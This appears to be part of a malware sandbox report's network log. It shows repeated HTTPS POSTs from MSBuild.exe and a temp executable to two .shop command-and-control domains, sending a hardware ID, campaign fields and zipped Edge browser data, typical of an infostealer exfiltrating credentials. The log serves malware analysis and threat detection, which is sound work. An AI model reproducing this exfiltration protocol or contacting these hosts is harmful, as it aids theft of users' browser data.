2024-02-20 23:22:40 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 70 61 6c 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--pal
2024-02-20 23:22:40 UTC	924	OUT	Data Raw: 42 72 6f 77 73 65 72 44 42 2f 4d 41 4e 49 46 45 53 54 2d 30 30 30 30 30 31 01 29 00 d6 ff 95 7c b9 c5 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 75 1d 9c a6 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 0e 18 a7 1a 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: BrowserDB/MANIFEST-000001)\|"leveldb.BytewiseComparatorPKP{.)PKuEdge/BrowserVersion.txtPK% WEdge/dp.txtPKA`
2024-02-20 23:22:41 UTC	820	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ji5scmh62agi5stgahgf519mio; expires=Sat, 15-Jun-2024 17:09:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xNbCbtP0Bb%2BOFurl%2FhuPc%2F622xPXO40TrQkrMLer%2FdNkxDRfluVYKRxnYRwf1JryLbSZwZJmB5JwoQoh4coPrEPvKFy2SEOpry9mzWvTKXCoRC3TBc%2F92%2FGawOZ1telbf7ZwlfGT3K5FQr7jV78%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e352a860f84-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:41 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49719	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:41 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19961 Host: isotrimorphicnongrasse.shop
2024-02-20 23:22:41 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 70 61 6c 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--pal
2024-02-20 23:22:41 UTC	4630	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 Data Ascii: +?2+?2+?o?Mp5p_
2024-02-20 23:22:45 UTC	822	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6bj4nvo2opq362r6n8u93b42kh; expires=Sat, 15-Jun-2024 17:09:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b10VbmARIgtFYPuVclekIXZohj3E0zjM%2B%2BRt5lVExOMP4j6HC7tcfo9LEvW7VtktvvsVZdpIuufj%2FTUNVCIXHmjSaTb%2BeWtcE0WdzBlLY5WHCIPzXZutqUNxjpL%2BR45Hq%2FcP01YI9BWs%2BwFwT00%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e3b1f744400-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:45 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49720	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:41 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14034 Host: resergvearyinitiani.shop
2024-02-20 23:22:41 UTC	14034	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-02-20 23:22:42 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4hejtdilmophco35i97aif4pn7; expires=Sat, 15-Jun-2024 17:09:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ElSTK2bks1Hf0vHzEL0HaMKdpdcrMXXiWBEArmhNQsJzvbWDCeYvjc%2FyT6cG7J2NRi6F480pQqASCnOUm0vBRka%2BXt00DvqTMN2twcuG07JWuckOB5qrUQV9TLQXDH5fsxuSzb%2FS3JX3sc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e3c6879432b-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:42 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49721	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:43 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 16264 Host: resergvearyinitiani.shop
2024-02-20 23:22:43 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-02-20 23:22:43 UTC	933	OUT	Data Raw: 2f 44 65 66 61 75 6c 74 2f 42 72 6f 77 73 65 72 44 42 2f 4d 41 4e 49 46 45 53 54 2d 30 30 30 30 30 31 01 29 00 d6 ff 95 7c b9 c5 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 75 1d 9c a6 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 0e 18 a7 1a 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 Data Ascii: /Default/BrowserDB/MANIFEST-000001)\|"leveldb.BytewiseComparatorPKP{.)PKuEdge/BrowserVersion.txtPK% WEdge/dp.txtPKA`
2024-02-20 23:22:44 UTC	816	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9o9rmes205gmg4d1fgtase40pi; expires=Sat, 15-Jun-2024 17:09:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H1j%2Bi2vcagiBOEZwVupTi4V9i7m08rfWndZxzAEuRWU0k%2FKhr1hUYyiVDRPgyAeBWfUMxIqJCZDPJVCB1ElMXqQNbtHqu8vfI%2Bs2FDBfOHqneKbQ%2B8tt1bRr7z%2FXTx3kCTiggDWHyGy%2FqzM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e46fc840c9e-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:44 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49727	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:51 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5444 Host: isotrimorphicnongrasse.shop
2024-02-20 23:22:51 UTC	5444	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 70 61 6c 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--pal
2024-02-20 23:22:51 UTC	816	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ri1vopd5hgi576mv0fmr46kauj; expires=Sat, 15-Jun-2024 17:09:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LqwvoMrQfNRo54bShZ5dwfVPp1yzRtmsCDbxZewb2ctmS%2BAZPgkQsQmfr7NcM3QgP8EurHUAebYL7Pv3ap5UJcWrgc%2Fi2sesLT7mZvljHIy9PdT8UuiOW1Mk%2FoiyW3bTFqmQsNbSh3UALgDy7%2Fs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e7599e88cc0-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:51 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49730	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:52 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1329 Host: isotrimorphicnongrasse.shop
2024-02-20 23:22:52 UTC	1329	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 70 61 6c 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--pal
2024-02-20 23:22:52 UTC	822	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5nr09benf890c5rt4g12viga99; expires=Sat, 15-Jun-2024 17:09:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tyZd4HMCW0gChxABjrJJV3AF%2BbhAlNrzhtywe4unY8cDI7vSiAFojoimtgq%2BlAL8VFwsi2%2BwLvwjQn605NcqyyDaml7QkWwhfF3%2FpwZKky8Fq%2Fxczzp%2BHP5CYhgKyrP3yeDBI72ok5K1p%2FmxBik%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e7b7a48422b-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:52 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49731	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:53 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19970 Host: resergvearyinitiani.shop
2024-02-20 23:22:53 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-02-20 23:22:53 UTC	4639	OUT	Data Raw: bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b Data Ascii: 2+?2+?2+?o?Mp5
2024-02-20 23:22:53 UTC	820	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9fcg2lstnso55s8qrekfrlri5b; expires=Sat, 15-Jun-2024 17:09:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FxGclIAYxFBsyxlyli4NVx5Y9SPgCYgp%2B1sIe%2B9snqlMDMy2htEkL7wbEBYPJKhXtpAP758xGfPXATafwYZwsYA%2BGNUt%2F4BLB0q9%2BsmpZEZ1cxgI58cxHELrOG5RrZ6o%2BQvqPWeI%2F5kdbew%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e82ef03422f-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:53 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49733	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:54 UTC	294	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 419034 Host: isotrimorphicnongrasse.shop
